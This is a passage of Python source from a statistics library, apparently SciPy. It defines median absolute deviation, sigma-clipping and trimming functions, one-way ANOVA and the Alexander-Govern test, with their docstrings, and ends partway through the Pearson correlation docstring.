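# the 1-d core used by `median_abs_deviation` below; with 'omit' it drops nans
# before taking the median absolute deviation, while with 'propagate' a single
# nan makes the result nan.
def _demo_mad_1d(x=(1.0, 2.0, np.nan, 100.0)):
    x = np.asarray(x, dtype=float)
    return (_mad_1d(x, np.median, 'propagate'),   # nan
            _mad_1d(x, np.median, 'omit'))        # 1.0, the MAD of [1, 2, 100]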
def median_abs_deviation(x, axis=0, center=np.median, scale=1.0,
nan_policy='propagate'):
r"""
Compute the median absolute deviation of the data along the given axis.
The median absolute deviation (MAD, [1]_) computes the median over the
absolute deviations from the median. It is a measure of dispersion
similar to the standard deviation but more robust to outliers [2]_.
The MAD of an empty array is ``np.nan``.
.. versionadded:: 1.5.0
Parameters
----------
x : array_like
Input array or object that can be converted to an array.
axis : int or None, optional
Axis along which the range is computed. Default is 0. If None, compute
the MAD over the entire array.
center : callable, optional
A function that will return the central value. The default is to use
np.median. Any user defined function used will need to have the
function signature ``func(arr, axis)``.
scale : scalar or str, optional
The numerical value of scale will be divided out of the final
result. The default is 1.0. The string "normal" is also accepted,
and results in `scale` being the inverse of the standard normal
quantile function at 0.75, which is approximately 0.67449.
Array-like scale is also allowed, as long as it broadcasts correctly
to the output such that ``out / scale`` is a valid operation. The
output dimensions depend on the input array, `x`, and the `axis`
argument.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
mad : scalar or ndarray
If ``axis=None``, a scalar is returned. If the input contains
integers or floats of smaller precision than ``np.float64``, then the
output data-type is ``np.float64``. Otherwise, the output data-type is
the same as that of the input.
See Also
--------
numpy.std, numpy.var, numpy.median, scipy.stats.iqr, scipy.stats.tmean,
scipy.stats.tstd, scipy.stats.tvar
Notes
-----
The `center` argument only affects the calculation of the central value
around which the MAD is calculated. That is, passing in ``center=np.mean``
will calculate the MAD around the mean - it will not calculate the *mean*
absolute deviation.
The input array may contain `inf`, but if `center` returns `inf`, the
corresponding MAD for that data will be `nan`.
References
----------
.. [1] "Median absolute deviation",
https://en.wikipedia.org/wiki/Median_absolute_deviation
.. [2] "Robust measures of scale",
https://en.wikipedia.org/wiki/Robust_measures_of_scale
Examples
--------
When comparing the behavior of `median_abs_deviation` with ``np.std``,
the latter is strongly affected when we change a single value of the array
to an outlier, while the MAD hardly changes:
>>> from scipy import stats
>>> x = stats.norm.rvs(size=100, scale=1, random_state=123456)
>>> x.std()
0.9973906394005013
>>> stats.median_abs_deviation(x)
0.82832610097857
>>> x[0] = 345.6
>>> x.std()
34.42304872314415
>>> stats.median_abs_deviation(x)
0.8323442311590675
Axis handling example:
>>> x = np.array([[10, 7, 4], [3, 2, 1]])
>>> x
array([[10, 7, 4],
[ 3, 2, 1]])
>>> stats.median_abs_deviation(x)
array([3.5, 2.5, 1.5])
>>> stats.median_abs_deviation(x, axis=None)
2.0
Scale normal example:
>>> x = stats.norm.rvs(size=1000000, scale=2, random_state=123456)
>>> stats.median_abs_deviation(x)
1.3487398527041636
>>> stats.median_abs_deviation(x, scale='normal')
1.9996446978061115
"""
if not callable(center):
raise TypeError("The argument 'center' must be callable. The given "
f"value {repr(center)} is not callable.")
# An error may be raised here, so fail-fast, before doing lengthy
# computations, even though `scale` is not used until later
if isinstance(scale, str):
if scale.lower() == 'normal':
scale = 0.6744897501960817 # special.ndtri(0.75)
else:
raise ValueError(f"{scale} is not a valid scale value.")
x = asarray(x)
# Consistent with `np.var` and `np.std`.
if not x.size:
if axis is None:
return np.nan
nan_shape = tuple(item for i, item in enumerate(x.shape) if i != axis)
if nan_shape == ():
# Return nan, not array(nan)
return np.nan
return np.full(nan_shape, np.nan)
contains_nan, nan_policy = _contains_nan(x, nan_policy)
if contains_nan:
if axis is None:
mad = _mad_1d(x.ravel(), center, nan_policy)
else:
mad = np.apply_along_axis(_mad_1d, axis, x, center, nan_policy)
else:
if axis is None:
med = center(x, axis=None)
mad = np.median(np.abs(x - med))
else:
# Wrap the call to center() in expand_dims() so it acts like
# keepdims=True was used.
med = np.expand_dims(center(x, axis=axis), axis)
mad = np.median(np.abs(x - med), axis=axis)
return mad / scale
# Keep the top newline so that the message does not show up on the stats page
_median_absolute_deviation_deprec_msg = """
To preserve the existing default behavior, use
`scipy.stats.median_abs_deviation(..., scale=1/1.4826)`.
The value 1.4826 is not numerically precise for scaling
with a normal distribution. For a numerically precise value, use
`scipy.stats.median_abs_deviation(..., scale='normal')`.
"""
# Due to numpy/gh-16349 we need to unindent the entire docstring
@np.deprecate(old_name='median_absolute_deviation',
new_name='median_abs_deviation',
message=_median_absolute_deviation_deprec_msg)
def median_absolute_deviation(x, axis=0, center=np.median, scale=1.4826,
nan_policy='propagate'):
r"""
Compute the median absolute deviation of the data along the given axis.
The median absolute deviation (MAD, [1]_) computes the median over the
absolute deviations from the median. It is a measure of dispersion
similar to the standard deviation but more robust to outliers [2]_.
The MAD of an empty array is ``np.nan``.
.. versionadded:: 1.3.0
Parameters
----------
x : array_like
Input array or object that can be converted to an array.
axis : int or None, optional
Axis along which the range is computed. Default is 0. If None, compute
the MAD over the entire array.
center : callable, optional
        A function that will return the central value. The default is to use
        np.median. Any user-defined function must have the signature
        ``func(arr, axis)``.
    scale : float, optional
The scaling factor applied to the MAD. The default scale (1.4826)
ensures consistency with the standard deviation for normally distributed
data.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
mad : scalar or ndarray
If ``axis=None``, a scalar is returned. If the input contains
integers or floats of smaller precision than ``np.float64``, then the
output data-type is ``np.float64``. Otherwise, the output data-type is
the same as that of the input.
See Also
--------
numpy.std, numpy.var, numpy.median, scipy.stats.iqr, scipy.stats.tmean,
scipy.stats.tstd, scipy.stats.tvar
Notes
-----
The `center` argument only affects the calculation of the central value
around which the MAD is calculated. That is, passing in ``center=np.mean``
will calculate the MAD around the mean - it will not calculate the *mean*
absolute deviation.
References
----------
.. [1] "Median absolute deviation",
https://en.wikipedia.org/wiki/Median_absolute_deviation
.. [2] "Robust measures of scale",
https://en.wikipedia.org/wiki/Robust_measures_of_scale
Examples
--------
When comparing the behavior of `median_absolute_deviation` with ``np.std``,
the latter is affected when we change a single value of an array to have an
outlier value while the MAD hardly changes:
>>> from scipy import stats
>>> x = stats.norm.rvs(size=100, scale=1, random_state=123456)
>>> x.std()
0.9973906394005013
>>> stats.median_absolute_deviation(x)
1.2280762773108278
>>> x[0] = 345.6
>>> x.std()
34.42304872314415
>>> stats.median_absolute_deviation(x)
1.2340335571164334
Axis handling example:
>>> x = np.array([[10, 7, 4], [3, 2, 1]])
>>> x
array([[10, 7, 4],
[ 3, 2, 1]])
>>> stats.median_absolute_deviation(x)
array([5.1891, 3.7065, 2.2239])
>>> stats.median_absolute_deviation(x, axis=None)
2.9652
"""
if isinstance(scale, str):
if scale.lower() == 'raw':
warnings.warn(
"use of scale='raw' is deprecated, use scale=1.0 instead",
np.VisibleDeprecationWarning
)
scale = 1.0
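    # The old function multiplied the MAD by `scale` (default 1.4826), whereas
    # `median_abs_deviation` divides by it, so pass the reciprocal.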
if not isinstance(scale, str):
scale = 1 / scale
return median_abs_deviation(x, axis=axis, center=center, scale=scale,
nan_policy=nan_policy)
#####################################
# TRIMMING FUNCTIONS #
#####################################
SigmaclipResult = namedtuple('SigmaclipResult', ('clipped', 'lower', 'upper'))
def sigmaclip(a, low=4., high=4.):
"""Perform iterative sigma-clipping of array elements.
    Starting from the full sample, all elements outside the critical range are
    removed, i.e. all elements of the working array `c` (a raveled copy of the
    input `a`) that satisfy either of the following conditions::
c < mean(c) - std(c)*low
c > mean(c) + std(c)*high
The iteration continues with the updated sample until no
elements are outside the (updated) range.
Parameters
----------
a : array_like
Data array, will be raveled if not 1-D.
low : float, optional
Lower bound factor of sigma clipping. Default is 4.
high : float, optional
Upper bound factor of sigma clipping. Default is 4.
Returns
-------
clipped : ndarray
Input array with clipped elements removed.
    lower : float
        Lower threshold value used for clipping.
    upper : float
        Upper threshold value used for clipping.
Examples
--------
>>> from scipy.stats import sigmaclip
>>> a = np.concatenate((np.linspace(9.5, 10.5, 31),
... np.linspace(0, 20, 5)))
>>> fact = 1.5
>>> c, low, upp = sigmaclip(a, fact, fact)
>>> c
array([ 9.96666667, 10. , 10.03333333, 10. ])
>>> c.var(), c.std()
(0.00055555555555555165, 0.023570226039551501)
>>> low, c.mean() - fact*c.std(), c.min()
(9.9646446609406727, 9.9646446609406727, 9.9666666666666668)
>>> upp, c.mean() + fact*c.std(), c.max()
(10.035355339059327, 10.035355339059327, 10.033333333333333)
>>> a = np.concatenate((np.linspace(9.5, 10.5, 11),
... np.linspace(-100, -50, 3)))
>>> c, low, upp = sigmaclip(a, 1.8, 1.8)
>>> (c == np.linspace(9.5, 10.5, 11)).all()
True
"""
c = np.asarray(a).ravel()
delta = 1
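    # `delta` counts how many elements the last pass removed; iterate until a
    # pass removes nothing.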
while delta:
c_std = c.std()
c_mean = c.mean()
size = c.size
critlower = c_mean - c_std * low
critupper = c_mean + c_std * high
c = c[(c >= critlower) & (c <= critupper)]
delta = size - c.size
return SigmaclipResult(c, critlower, critupper)
def trimboth(a, proportiontocut, axis=0):
"""Slice off a proportion of items from both ends of an array.
Slice off the passed proportion of items from both ends of the passed
array (i.e., with `proportiontocut` = 0.1, slices leftmost 10% **and**
rightmost 10% of scores). The trimmed values are the lowest and
highest ones.
Slice off less if proportion results in a non-integer slice index (i.e.
conservatively slices off `proportiontocut`).
Parameters
----------
a : array_like
Data to trim.
proportiontocut : float
        Proportion (in range 0-1) of total data set to trim off each end.
axis : int or None, optional
Axis along which to trim data. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
out : ndarray
Trimmed version of array `a`. The order of the trimmed content
is undefined.
See Also
--------
trim_mean
Examples
--------
>>> from scipy import stats
>>> a = np.arange(20)
>>> b = stats.trimboth(a, 0.1)
>>> b.shape
(16,)
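    When the proportion does not give a whole number of elements, the cut is
    rounded down, so slightly less than the requested fraction is removed from
    each end:
    >>> stats.trimboth(np.arange(10), 0.25).shape
    (6,)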
"""
a = np.asarray(a)
if a.size == 0:
return a
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
lowercut = int(proportiontocut * nobs)
uppercut = nobs - lowercut
if (lowercut >= uppercut):
raise ValueError("Proportion too big.")
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
sl = [slice(None)] * atmp.ndim
sl[axis] = slice(lowercut, uppercut)
return atmp[tuple(sl)]
def trim1(a, proportiontocut, tail='right', axis=0):
"""Slice off a proportion from ONE end of the passed array distribution.
If `proportiontocut` = 0.1, slices off 'leftmost' or 'rightmost'
10% of scores. The lowest or highest values are trimmed (depending on
the tail).
Slice off less if proportion results in a non-integer slice index
    (i.e. conservatively slices off `proportiontocut`).
Parameters
----------
a : array_like
Input array.
proportiontocut : float
        Fraction to cut off from the 'left' or 'right' of the distribution.
tail : {'left', 'right'}, optional
Defaults to 'right'.
axis : int or None, optional
Axis along which to trim data. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
trim1 : ndarray
Trimmed version of array `a`. The order of the trimmed content is
undefined.
Examples
--------
>>> from scipy import stats
>>> a = np.arange(20)
>>> b = stats.trim1(a, 0.5, 'left')
>>> b
array([10, 11, 12, 13, 14, 16, 15, 17, 18, 19])
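    Because the order of the trimmed output is undefined, it is easiest to
    check summary values of the result:
    >>> c = stats.trim1(np.arange(10), 0.25, 'right')
    >>> c.shape
    (8,)
    >>> c.max()
    7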
"""
a = np.asarray(a)
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
# avoid possible corner case
if proportiontocut >= 1:
return []
if tail.lower() == 'right':
lowercut = 0
uppercut = nobs - int(proportiontocut * nobs)
elif tail.lower() == 'left':
lowercut = int(proportiontocut * nobs)
uppercut = nobs
    atmp = np.partition(a, (lowercut, uppercut - 1), axis)
    # Slice along the requested axis, mirroring `trimboth`; a bare
    # `atmp[lowercut:uppercut]` would always slice along axis 0.
    sl = [slice(None)] * atmp.ndim
    sl[axis] = slice(lowercut, uppercut)
    return atmp[tuple(sl)]
def trim_mean(a, proportiontocut, axis=0):
"""Return mean of array after trimming distribution from both tails.
If `proportiontocut` = 0.1, slices off 'leftmost' and 'rightmost' 10% of
scores. The input is sorted before slicing. Slices off less if proportion
results in a non-integer slice index (i.e., conservatively slices off
    `proportiontocut`).
Parameters
----------
a : array_like
Input array.
proportiontocut : float
        Fraction to cut off from both tails of the distribution.
axis : int or None, optional
Axis along which the trimmed means are computed. Default is 0.
If None, compute over the whole array `a`.
Returns
-------
trim_mean : ndarray
Mean of trimmed array.
See Also
--------
trimboth
tmean : Compute the trimmed mean ignoring values outside given `limits`.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.trim_mean(x, 0.1)
9.5
>>> x2 = x.reshape(5, 4)
>>> x2
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15],
[16, 17, 18, 19]])
>>> stats.trim_mean(x2, 0.25)
array([ 8., 9., 10., 11.])
>>> stats.trim_mean(x2, 0.25, axis=1)
array([ 1.5, 5.5, 9.5, 13.5, 17.5])
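    The result is the mean of the values kept by `trimboth` with the same
    proportion (exact here, where the arithmetic involves no rounding):
    >>> stats.trim_mean(x, 0.1) == stats.trimboth(x, 0.1).mean()
    True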
"""
a = np.asarray(a)
if a.size == 0:
return np.nan
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
lowercut = int(proportiontocut * nobs)
uppercut = nobs - lowercut
if (lowercut > uppercut):
raise ValueError("Proportion too big.")
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
sl = [slice(None)] * atmp.ndim
sl[axis] = slice(lowercut, uppercut)
return np.mean(atmp[tuple(sl)], axis=axis)
F_onewayResult = namedtuple('F_onewayResult', ('statistic', 'pvalue'))
class F_onewayConstantInputWarning(RuntimeWarning):
"""
Warning generated by `f_oneway` when an input is constant, e.g.
each of the samples provided is a constant array.
"""
def __init__(self, msg=None):
if msg is None:
msg = ("Each of the input arrays is constant;"
"the F statistic is not defined or infinite")
self.args = (msg,)
class F_onewayBadInputSizesWarning(RuntimeWarning):
"""
Warning generated by `f_oneway` when an input has length 0,
or if all the inputs have length 1.
"""
pass
def _create_f_oneway_nan_result(shape, axis):
"""
This is a helper function for f_oneway for creating the return values
in certain degenerate conditions. It creates return values that are
all nan with the appropriate shape for the given `shape` and `axis`.
"""
axis = np.core.multiarray.normalize_axis_index(axis, len(shape))
shp = shape[:axis] + shape[axis+1:]
if shp == ():
f = np.nan
prob = np.nan
else:
f = np.full(shp, fill_value=np.nan)
prob = f.copy()
return F_onewayResult(f, prob)
def _first(arr, axis):
"""Return arr[..., 0:1, ...] where 0:1 is in the `axis` position."""
return np.take_along_axis(arr, np.array(0, ndmin=arr.ndim), axis)
def f_oneway(*args, axis=0):
"""Perform one-way ANOVA.
The one-way ANOVA tests the null hypothesis that two or more groups have
the same population mean. The test is applied to samples from two or
more groups, possibly with differing sizes.
Parameters
----------
sample1, sample2, ... : array_like
The sample measurements for each group. There must be at least
two arguments. If the arrays are multidimensional, then all the
dimensions of the array must be the same except for `axis`.
axis : int, optional
Axis of the input arrays along which the test is applied.
Default is 0.
Returns
-------
statistic : float
The computed F statistic of the test.
pvalue : float
The associated p-value from the F distribution.
Warns
-----
F_onewayConstantInputWarning
        Raised if each of the input arrays is a constant array.
In this case the F statistic is either infinite or isn't defined,
so ``np.inf`` or ``np.nan`` is returned.
F_onewayBadInputSizesWarning
Raised if the length of any input array is 0, or if all the input
arrays have length 1. ``np.nan`` is returned for the F statistic
and the p-value in these cases.
Notes
-----
The ANOVA test has important assumptions that must be satisfied in order
for the associated p-value to be valid.
1. The samples are independent.
2. Each sample is from a normally distributed population.
3. The population standard deviations of the groups are all equal. This
property is known as homoscedasticity.
If these assumptions are not true for a given set of data, it may still
be possible to use the Kruskal-Wallis H-test (`scipy.stats.kruskal`) or
the Alexander-Govern test (`scipy.stats.alexandergovern`) although with
some loss of power.
The length of each group must be at least one, and there must be at
least one group with length greater than one. If these conditions
are not satisfied, a warning is generated and (``np.nan``, ``np.nan``)
is returned.
If each group contains constant values, and there exist at least two
groups with different values, the function generates a warning and
returns (``np.inf``, 0).
    If all values in all groups are the same, the function generates a warning
and returns (``np.nan``, ``np.nan``).
The algorithm is from Heiman [2]_, pp.394-7.
References
----------
.. [1] R. Lowry, "Concepts and Applications of Inferential Statistics",
Chapter 14, 2014, http://vassarstats.net/textbook/
.. [2] G.W. Heiman, "Understanding research methods and statistics: An
integrated introduction for psychology", Houghton, Mifflin and
Company, 2001.
.. [3] G.H. McDonald, "Handbook of Biological Statistics", One-way ANOVA.
http://www.biostathandbook.com/onewayanova.html
Examples
--------
>>> from scipy.stats import f_oneway
Here are some data [3]_ on a shell measurement (the length of the anterior
adductor muscle scar, standardized by dividing by length) in the mussel
Mytilus trossulus from five locations: Tillamook, Oregon; Newport, Oregon;
Petersburg, Alaska; Magadan, Russia; and Tvarminne, Finland, taken from a
much larger data set used in McDonald et al. (1991).
>>> tillamook = [0.0571, 0.0813, 0.0831, 0.0976, 0.0817, 0.0859, 0.0735,
... 0.0659, 0.0923, 0.0836]
>>> newport = [0.0873, 0.0662, 0.0672, 0.0819, 0.0749, 0.0649, 0.0835,
... 0.0725]
>>> petersburg = [0.0974, 0.1352, 0.0817, 0.1016, 0.0968, 0.1064, 0.105]
>>> magadan = [0.1033, 0.0915, 0.0781, 0.0685, 0.0677, 0.0697, 0.0764,
... 0.0689]
>>> tvarminne = [0.0703, 0.1026, 0.0956, 0.0973, 0.1039, 0.1045]
>>> f_oneway(tillamook, newport, petersburg, magadan, tvarminne)
F_onewayResult(statistic=7.121019471642447, pvalue=0.0002812242314534544)
`f_oneway` accepts multidimensional input arrays. When the inputs
are multidimensional and `axis` is not given, the test is performed
along the first axis of the input arrays. For the following data, the
test is performed three times, once for each column.
>>> a = np.array([[9.87, 9.03, 6.81],
... [7.18, 8.35, 7.00],
... [8.39, 7.58, 7.68],
... [7.45, 6.33, 9.35],
... [6.41, 7.10, 9.33],
... [8.00, 8.24, 8.44]])
>>> b = np.array([[6.35, 7.30, 7.16],
... [6.65, 6.68, 7.63],
... [5.72, 7.73, 6.72],
... [7.01, 9.19, 7.41],
... [7.75, 7.87, 8.30],
... [6.90, 7.97, 6.97]])
>>> c = np.array([[3.31, 8.77, 1.01],
... [8.25, 3.24, 3.62],
... [6.32, 8.81, 5.19],
... [7.48, 8.83, 8.91],
... [8.59, 6.01, 6.07],
... [3.07, 9.72, 7.48]])
>>> F, p = f_oneway(a, b, c)
>>> F
array([1.75676344, 0.03701228, 3.76439349])
>>> p
array([0.20630784, 0.96375203, 0.04733157])
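    As described in the Notes, constant groups are degenerate: if each group
    is constant but the groups are not all equal, the statistic is infinite
    and a ``F_onewayConstantInputWarning`` is emitted:
    >>> f_oneway([4, 4, 4], [5, 5, 5])
    F_onewayResult(statistic=inf, pvalue=0.0)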
"""
if len(args) < 2:
raise TypeError(f'at least two inputs are required; got {len(args)}.')
args = [np.asarray(arg, dtype=float) for arg in args]
# ANOVA on N groups, each in its own array
num_groups = len(args)
# We haven't explicitly validated axis, but if it is bad, this call of
# np.concatenate will raise np.AxisError. The call will raise ValueError
# if the dimensions of all the arrays, except the axis dimension, are not
# the same.
alldata = np.concatenate(args, axis=axis)
bign = alldata.shape[axis]
# Check this after forming alldata, so shape errors are detected
# and reported before checking for 0 length inputs.
if any(arg.shape[axis] == 0 for arg in args):
warnings.warn(F_onewayBadInputSizesWarning('at least one input '
'has length 0'))
return _create_f_oneway_nan_result(alldata.shape, axis)
# Must have at least one group with length greater than 1.
if all(arg.shape[axis] == 1 for arg in args):
msg = ('all input arrays have length 1. f_oneway requires that at '
'least one input has length greater than 1.')
warnings.warn(F_onewayBadInputSizesWarning(msg))
return _create_f_oneway_nan_result(alldata.shape, axis)
# Check if the values within each group are constant, and if the common
# value in at least one group is different from that in another group.
# Based on https://github.com/scipy/scipy/issues/11669
# If axis=0, say, and the groups have shape (n0, ...), (n1, ...), ...,
# then is_const is a boolean array with shape (num_groups, ...).
    # It is True if the groups along the axis slice are each constant.
# In the typical case where each input array is 1-d, is_const is a
# 1-d array with length num_groups.
is_const = np.concatenate([(_first(a, axis) == a).all(axis=axis,
keepdims=True)
for a in args], axis=axis)
# all_const is a boolean array with shape (...) (see previous comment).
# It is True if the values within each group along the axis slice are
# the same (e.g. [[3, 3, 3], [5, 5, 5, 5], [4, 4, 4]]).
all_const = is_const.all(axis=axis)
if all_const.any():
warnings.warn(F_onewayConstantInputWarning())
# all_same_const is True if all the values in the groups along the axis=0
# slice are the same (e.g. [[3, 3, 3], [3, 3, 3, 3], [3, 3, 3]]).
all_same_const = (_first(alldata, axis) == alldata).all(axis=axis)
# Determine the mean of the data, and subtract that from all inputs to a
# variance (via sum_of_sq / sq_of_sum) calculation. Variance is invariant
# to a shift in location, and centering all data around zero vastly
# improves numerical stability.
offset = alldata.mean(axis=axis, keepdims=True)
alldata -= offset
normalized_ss = _square_of_sums(alldata, axis=axis) / bign
sstot = _sum_of_squares(alldata, axis=axis) - normalized_ss
ssbn = 0
for a in args:
ssbn += _square_of_sums(a - offset, axis=axis) / a.shape[axis]
# Naming: variables ending in bn/b are for "between treatments", wn/w are
# for "within treatments"
ssbn -= normalized_ss
sswn = sstot - ssbn
dfbn = num_groups - 1
dfwn = bign - num_groups
msb = ssbn / dfbn
msw = sswn / dfwn
with np.errstate(divide='ignore', invalid='ignore'):
f = msb / msw
prob = special.fdtrc(dfbn, dfwn, f) # equivalent to stats.f.sf
# Fix any f values that should be inf or nan because the corresponding
# inputs were constant.
if np.isscalar(f):
if all_same_const:
f = np.nan
prob = np.nan
elif all_const:
f = np.inf
prob = 0.0
else:
f[all_const] = np.inf
prob[all_const] = 0.0
f[all_same_const] = np.nan
prob[all_same_const] = np.nan
return F_onewayResult(f, prob)
def alexandergovern(*args, nan_policy='propagate'):
"""Performs the Alexander Govern test.
The Alexander-Govern approximation tests the equality of k independent
means in the face of heterogeneity of variance. The test is applied to
samples from two or more groups, possibly with differing sizes.
Parameters
----------
sample1, sample2, ... : array_like
The sample measurements for each group. There must be at least
two samples.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The computed A statistic of the test.
pvalue : float
The associated p-value from the chi-squared distribution.
Warns
-----
AlexanderGovernConstantInputWarning
Raised if an input is a constant array. The statistic is not defined
in this case, so ``np.nan`` is returned.
See Also
--------
f_oneway : one-way ANOVA
Notes
-----
The use of this test relies on several assumptions.
1. The samples are independent.
2. Each sample is from a normally distributed population.
    3. Unlike `f_oneway`, this test does not assume homoscedasticity,
       instead relaxing the assumption of equal variances.
    Input samples must be finite, one-dimensional, and have size greater
    than one.
References
----------
.. [1] Alexander, Ralph A., and Diane M. Govern. "A New and Simpler
Approximation for ANOVA under Variance Heterogeneity." Journal
of Educational Statistics, vol. 19, no. 2, 1994, pp. 91-101.
JSTOR, www.jstor.org/stable/1165140. Accessed 12 Sept. 2020.
Examples
--------
>>> from scipy.stats import alexandergovern
Here are some data on annual percentage rate of interest charged on
new car loans at nine of the largest banks in four American cities
taken from the National Institute of Standards and Technology's
ANOVA dataset.
We use `alexandergovern` to test the null hypothesis that all cities
have the same mean APR against the alternative that the cities do not
all have the same mean APR. We decide that a significance level of 5%
is required to reject the null hypothesis in favor of the alternative.
>>> atlanta = [13.75, 13.75, 13.5, 13.5, 13.0, 13.0, 13.0, 12.75, 12.5]
>>> chicago = [14.25, 13.0, 12.75, 12.5, 12.5, 12.4, 12.3, 11.9, 11.9]
>>> houston = [14.0, 14.0, 13.51, 13.5, 13.5, 13.25, 13.0, 12.5, 12.5]
>>> memphis = [15.0, 14.0, 13.75, 13.59, 13.25, 12.97, 12.5, 12.25,
... 11.89]
>>> alexandergovern(atlanta, chicago, houston, memphis)
AlexanderGovernResult(statistic=4.65087071883494,
pvalue=0.19922132490385214)
The p-value is 0.1992, indicating a nearly 20% chance of observing
such an extreme value of the test statistic under the null hypothesis.
This exceeds 5%, so we do not reject the null hypothesis in favor of
the alternative.
"""
args = _alexandergovern_input_validation(args, nan_policy)
if np.any([(arg == arg[0]).all() for arg in args]):
warnings.warn(AlexanderGovernConstantInputWarning())
return AlexanderGovernResult(np.nan, np.nan)
# The following formula numbers reference the equation described on
# page 92 by Alexander, Govern. Formulas 5, 6, and 7 describe other
# tests that serve as the basis for equation (8) but are not needed
# to perform the test.
# precalculate mean and length of each sample
lengths = np.array([ma.count(arg) if nan_policy == 'omit' else len(arg)
for arg in args])
means = np.array([np.mean(arg) for arg in args])
# (1) determine standard error of the mean for each sample
standard_errors = [np.std(arg, ddof=1) / np.sqrt(length)
for arg, length in zip(args, lengths)]
# (2) define a weight for each sample
inv_sq_se = 1 / np.square(standard_errors)
weights = inv_sq_se / np.sum(inv_sq_se)
# (3) determine variance-weighted estimate of the common mean
var_w = np.sum(weights * means)
# (4) determine one-sample t statistic for each group
t_stats = (means - var_w)/standard_errors
# calculate parameters to be used in transformation
v = lengths - 1
a = v - .5
b = 48 * a**2
c = (a * np.log(1 + (t_stats ** 2)/v))**.5
# (8) perform a normalizing transformation on t statistic
z = (c + ((c**3 + 3*c)/b) -
((4*c**7 + 33*c**5 + 240*c**3 + 855*c) /
(b**2*10 + 8*b*c**4 + 1000*b)))
# (9) calculate statistic
A = np.sum(np.square(z))
# "[the p value is determined from] central chi-square random deviates
# with k - 1 degrees of freedom". Alexander, Govern (94)
p = distributions.chi2.sf(A, len(args) - 1)
return AlexanderGovernResult(A, p)
def _alexandergovern_input_validation(args, nan_policy):
if len(args) < 2:
raise TypeError(f"2 or more inputs required, got {len(args)}")
# input arrays are flattened
args = [np.asarray(arg, dtype=float) for arg in args]
for i, arg in enumerate(args):
if np.size(arg) <= 1:
raise ValueError("Input sample size must be greater than one.")
if arg.ndim != 1:
raise ValueError("Input samples must be one-dimensional")
if np.isinf(arg).any():
raise ValueError("Input samples must be finite.")
contains_nan, nan_policy = _contains_nan(arg, nan_policy=nan_policy)
if contains_nan and nan_policy == 'omit':
args[i] = ma.masked_invalid(arg)
return args
AlexanderGovernResult = make_dataclass("AlexanderGovernResult", ("statistic",
"pvalue"))
class AlexanderGovernConstantInputWarning(RuntimeWarning):
"""Warning generated by `alexandergovern` when an input is constant."""
def __init__(self, msg=None):
if msg is None:
msg = ("An input array is constant; the statistic is not defined.")
self.args = (msg,)
class PearsonRConstantInputWarning(RuntimeWarning):
"""Warning generated by `pearsonr` when an input is constant."""
def __init__(self, msg=None):
if msg is None:
msg = ("An input array is constant; the correlation coefficient "
"is not defined.")
self.args = (msg,)
class PearsonRNearConstantInputWarning(RuntimeWarning):
"""Warning generated by `pearsonr` when an input is nearly constant."""
def __init__(self, msg=None):
if msg is None:
msg = ("An input array is nearly constant; the computed "
"correlation coefficient may be inaccurate.")
self.args = (msg,)
def pearsonr(x, y):
r"""
Pearson correlation coefficient and p-value for testing non-correlation.
The Pearson correlation coefficient [1]_ measures the linear relationship
between two datasets. The calculation of the p-value relies on the
assumption that each dataset is normally distributed. (See Kowalski [3]_
for a discussion of the effects of non-normality of the input on the
distribution of the correlation coefficient.) Like other correlation
coefficients, this one varies between -1 and +1 with 0 implying no
correlation. Correlations of -1 or +1 imply an exact linear relationship.
Parameters
----------
x : (N,) array_like
Input array.
y : (N,) array_like
Input array.
Returns
-------
r : float
Pearson's correlation coefficient.
p-value : float
Two-tailed p-value.
Warns
-----
PearsonRConstantInputWarning
Raised if an input is a constant array. The correlation coefficient
is not defined in this case, so ``np.nan`` is returned.
PearsonRNearConstantInputWarning
Raised if an input is "nearly" constant. The array ``x`` is considered
nearly constant if ``norm(x - mean(x)) < 1e-13 * abs(mean(x))``.
Numerical errors in the calculation ``x - mean(x)`` in this case might
result in an inaccurate calculation of r.
See Also
--------
spearmanr : Spearman rank-order correlation coefficient.
kendalltau : Kendall's tau, a correlation measure for ordinal data.
Notes
-----
The correlation coefficient is calculated as follows:
.. math::
r = \frac{\sum (x - m_x) (y - m_y)}
{\sqrt{\sum (x - m_x)^2 \sum (y - m_y)^2}}
where :math:`m_x` is the mean of the vector x and :math:`m_y` is
the mean of the vector y.
Under the assumption that x and y are drawn from
independent normal distributions (so the population correlation coefficient
is 0), the probability density function of the sample correlation
coefficient r is ([1]_, [2]_):
.. math::
f(r) = \frac{{(1-r^2)}^{n/2-2}}{\mathrm{B}(\frac{1}{2},\frac{n}{2}-1)}
where n is the number of samples, and B is the beta function. This
is sometimes referred to as the exact distribution of r. This is
the distribution that is used in `pearsonr` to compute the p-value.
The distribution is a beta distribution on the interval [-1, 1],
with equal shape parameters a = b = n/2 - 1. In terms of SciPy's
implementation of the beta distribution, the distribution of r is::
dist = scipy.stats.beta(n/2 - 1, n/2 - 1, loc=-1, scale=2)
The p-value returned by `pearsonr` is a two-sided p-value. The p-value
roughly indicates the probability of an uncorrelated system
producing datasets that have a Pearson correlation at least as extreme
as the one computed from these datasets. More precisely, for a
given sample with correlation coefficient r, the p-value is
the probability that abs(r') of a random sample x' and y' drawn from
the population with zero correlation would be greater than or equal
to abs(r). In terms of the object ``dist`` shown above, the p-value
for a given r and length n can be computed as::
p = 2*dist.cdf(-abs(r))
When n is 2, the above continuous distribution is not well-defined.
One can interpret the limit of the beta distribution as the shape
